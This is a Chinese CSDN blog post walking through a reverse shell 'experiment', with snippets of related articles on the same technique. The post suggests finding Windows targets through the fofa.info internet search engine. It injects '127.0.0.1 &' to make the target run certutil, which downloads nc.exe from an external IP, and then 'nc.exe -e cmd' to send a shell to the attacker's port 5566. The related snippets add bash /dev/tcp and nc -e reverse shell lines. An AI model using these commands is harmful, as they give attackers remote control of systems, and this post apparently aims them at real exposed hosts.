【反弹shell实验】

最新推荐文章于 2024-09-18 22:00:10 发布
最新推荐文章于 2024-09-18 22:00:10 发布
阅读量1.2k 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45041683/article/details/126912714
版权

反弹shell实验

###一、实验所需环境及使用链接汇总:

  1. nc 软件下载,下载地址:https://sourceforge.net/projects/netcat/postdownload?source=dlp
  2. 靶场地址:https://fofa.info/
  3. 一台外网攻击机
    ###二、实验步骤:
    1、找到对应靶机,测试是否可以重连,Windows 的主机
    在这里插入图片描述
    2、下载NC,127.0.0.1 &
    certutil -urlcache -split -f http://114.118.80.138/nc.exe #下载文件到当前目录下

certutil -urlcache -split -f http://114.118.80.138/nc.exe c:/users/xie/desktop/nc.exe #下载文件到指定目录下
3、dir 看到是有这个地址的在这里插入图片描述
4、反弹shell
127.0.0.1 & nc.exe -e cmd 攻击机ip 5566 靶机执行如上命令
攻击机监听5566端口
在这里插入图片描述
可以看到靶机的shell 在攻击机上了。
在这里插入图片描述

入水莽夫
关注
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1878
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
mysql 反弹shell_反弹shell升级成交互式shell
weixin_39640573的博客
01-27 647
实验环境:A : kali 虚拟机B: centos7.5 虚拟机1. A 机 kali 虚拟机 设置监听 端口root@kali64:~# nc -lvvp 9001# 端口随便定义,没被使用就行2. B机 执行命令反弹shell[root@localhost ~]# bash -i >& /dev/tcp/192.168.2.128/9001 0>&1# ip地...
【渗透笔记】windows反弹shell方法大全
白菜猪肉炖粉条
01-06 2001
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。 反向shell反弹shell): 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口 被占用等问题导致被控端不能正常接收发送过来的数据包。 nc nc正向shell 被控端: nc -lvvp 6666 -e cmd.exe 开启监听 控制端: nc 192.168.1.62 6666 此原理就是,被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得sh
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
siu~
08-29 844
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
渗透测试--反弹shell(1)
最新发布
weixin_43520214的博客
09-18 781
反弹shell(Reverse Shell)是一种计算机安全领域的术语,通常出现在讨论网络安全、渗透测试或黑客攻防技术时。它指的是这样一种情况:攻击者首先在自己的机器上监听某个特定的网络端口,然后通过某种手段(例如利用软件漏洞)在目标系统上执行一段代码,这段代码会让目标系统主动连接回攻击者的机器。一旦建立了这个连接,攻击者就可以通过这个连接对目标系统发送命令并接收其输出,从而达到远程控制目标系统的目的。反弹shell与普通(正向)shell的主要区别在于连接的方向。
Windows 反弹shell方法
weixin_53747497的博客
07-12 3010
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
day01 操作系统&文件下载&反弹shell&防火墙绕过
wanjia01的博客
03-03 5771
#知识点: 1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词 2、必备技能-操作系统-用途&命令&权限&用户&防火墙 3、必备技能-文件下载-缘由&场景&使用-提权&后渗透 4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透 前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒, 反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞
【DVWA】反弹shell实验
命运的旋律的博客
12-13 1348
反弹shell实验 实验环境:metasploitable2;dvwa-linux版 ##操作过程 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序 #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socket. SOC...
mysql 反弹shell_Linux下几种反弹Shell方法的总结与理解
weixin_39929465的博客
01-27 1446
*本文原创作者:LlawLiet,本文属FreeBuf原创奖励计划,未经许可禁止转载。之前在网上看到很多师傅们总结的linux反弹shell的一些方法,为了更熟练的去运用这些技术,于是自己花精力查了很多资料去理解这些命令的含义,将研究的成果记录在这里,所谓的反弹shell,指的是我们在自己的机器上开启监听,然后在被攻击者的机器上发送连接请求去连接我们的机器,将被攻击者的shell反弹到我们的机器上...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
nc--反弹shell
wzhua的博客
08-04 2747
nc--反弹shell,小实验
Netcat(NC)正反弹shell
来到了学渣的博客
01-07 2136
Necat(NC)正反弹shell Netcat反向反弹shell 目标:Win7的shell反弹到kali上 kali的nc命令 nc -lvp 888 Win7靶机nc命令 * nc64.exe IP 端口号 -e cmd.exe 然后可以在kali攻击端控制目标端的win7系统 Netcat正向反弹shell 目标是将kali上的shell弹到win7上 kali的n...
[Shell]利用JS文件反弹Shell
baguangman5501的博客
09-17 449
0x01 模拟环境 攻击: kali ip: 192.168.248.132 测试: windows 7 x64 ip: 192.168.248.136 0x02 工具地址 https://github.com/CroweCybersecurity/ps1encode git clone https://github.com/CroweCybersecurity/ps1encode.g...
内网渗透-常用反弹shell方法总结
lza20001103的博客
04-15 2524
内网渗透-常用反弹shell方法总结
基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
今天是几号的博客
03-08 1385
ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上。NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。为什么开启防火墙后 whoami数据还是可以带外回显? ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层, 但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。
后渗透之文件系统+上传下载文件
qq_51550750的博客
06-27 1703
MSF后渗透 文件系统,文件的上传和下载
反弹shell的方法和场景
weixin_45653478的博客
04-01 1724
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
第一节:基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过
m0_56655187的博客
01-02 933
基础入门-操作系统&名词&文件下载&反弹 SHELL&防火墙绕过。
深度解析:Linux反弹shell的分类与本质
"不一样的视角剖析Linux 反弹shell水印版.pdf" 本文深入探讨了Linux环境下的反弹shell,从一个新的视角进行分类和解析,旨在揭示更多技术细节。作者指出,传统的反弹shell分类通常只分为交互式和非交互式,但这种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值